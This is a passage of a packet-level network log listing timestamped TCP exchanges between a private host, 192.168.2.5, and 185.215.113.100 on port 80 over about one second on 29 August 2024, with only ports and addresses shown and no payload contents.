Aug 29, 2024 15:42:56.852555037 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.852557898 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.852570057 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.852581024 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.852602959 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.852602959 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.852646112 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.853307962 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.853348970 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.853504896 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.853513956 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.853523016 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.853534937 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.853549957 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.853558064 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.853562117 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.853583097 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.853614092 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.853642941 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.853733063 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.855026007 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.855036974 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.855046988 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.855057001 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.855067968 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.855077982 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.855086088 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.855088949 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.855124950 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.855142117 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.855160952 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.855170965 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.855210066 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.855349064 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.855362892 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.855371952 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.855382919 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.855392933 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.855416059 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.855416059 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.855458975 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.856306076 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.856317043 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.856359005 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.856447935 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.856462955 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.856472015 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.856488943 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.856501102 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.856512070 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.856570959 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.856570959 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.856570959 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.856580973 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.856591940 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.856606007 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.856622934 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.856647968 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.856762886 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.856774092 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.856780052 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.856823921 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.857583046 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.857593060 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.857620955 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.857682943 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.857748985 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.857758999 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.857790947 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.857820988 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.857918024 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.857928038 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.857939005 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.857956886 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.857959032 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.857969999 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.857980013 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.857984066 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.857984066 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.857992887 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.858002901 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.858059883 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.858078003 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.858088970 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.858097076 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.858107090 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.858117104 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.858129025 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.858135939 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.858135939 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.858170033 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.858202934 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.858211040 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.858221054 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.858230114 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.858253002 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.858285904 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.858386993 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.858397961 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.858407021 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.858417034 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.858427048 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.858459949 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.858470917 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.858676910 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.858689070 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.858697891 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.858727932 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.858727932 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.858746052 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.858819008 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.858829975 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.858839035 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.858863115 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.858880043 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.859002113 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.859014034 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.859023094 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.859045029 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.859076023 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.859169006 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.859179020 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.859189987 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.859210014 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.859237909 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.859358072 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.859376907 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.859389067 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.859399080 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.859410048 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.859410048 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.859421015 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.859431982 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.859436989 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.859442949 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.859466076 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.859466076 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.859499931 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.859532118 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.859541893 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.859550953 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.859560966 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.859581947 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.859581947 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.859601974 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.862308979 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.862323046 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.862384081 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.862452984 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.862463951 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.862473011 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.862483978 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.862493992 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.862504005 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.862510920 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.862529993 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.862575054 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.862613916 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.862624884 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.862633944 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.862643957 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.862653017 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.862658024 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.862689972 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.862732887 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.862761021 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.862771034 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.862798929 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.863534927 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.863543987 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.863549948 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.863583088 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.863614082 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.863676071 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.863686085 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.863696098 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.863707066 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.863739967 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.863773108 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.863820076 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.863828897 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.863835096 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.863846064 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.863854885 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.863864899 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.863873959 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.863877058 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.863890886 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.863919020 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.863919020 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.863940954 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.863960981 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.863981009 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.864011049 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.864011049 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.937741041 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.937783957 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.937793970 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.937803030 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.937828064 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.937839031 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.937848091 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.937854052 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.937913895 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.937913895 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.938565969 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.938580036 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.938591003 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.938647032 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.938657045 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.938666105 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.938668013 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.938678026 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.938685894 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.938695908 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.938705921 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.938724041 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.938739061 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.939913988 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.939928055 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.939939022 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.939987898 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.939990997 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.940004110 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.940004110 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.940015078 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.940026999 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.940045118 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.940045118 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.940067053 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.940089941 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.940104008 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.940114021 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.940114975 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.940126896 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.940139055 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.940148115 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.940160036 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.940181971 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.940198898 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.940211058 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.940220118 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.940241098 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.940289021 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.941467047 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.941494942 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.941510916 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.941529036 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.941538095 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.941545963 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.941545963 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.941556931 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.941562891 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.941570044 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.941601038 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.941612005 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.941647053 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.941658020 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.941667080 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.941678047 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.941694021 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.941694021 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.941705942 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.941719055 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.941724062 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.941744089 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.941773891 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.942344904 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.942397118 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.942415953 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.942420959 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.942434072 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.942445040 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.942446947 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.942466974 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.942466974 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.942485094 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.942496061 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.942512035 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.942538023 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.942538023 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.976397991 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.981271982 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.225778103 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.225796938 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.225809097 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.225815058 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.225841999 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.225855112 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.225876093 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.225891113 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.225903034 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.225922108 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.225970030 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.226010084 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.226021051 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.226031065 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.226042986 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.226052999 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.226057053 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.226058960 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.226085901 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.226114035 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.226119041 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.226130009 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.226135015 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.226166010 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.226198912 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.226207972 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.226219893 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.226228952 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.226252079 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.226289988 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.226394892 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.226418972 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.226435900 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.226464987 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.226470947 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.226481915 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.226520061 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.226526976 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.226526976 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.226532936 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.226573944 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.226574898 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.226629019 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.226639986 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.226650000 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.226660967 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.226672888 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.226694107 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.226694107 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.226728916 CEST	49704	80	192.168.2.5	185.215.113.100
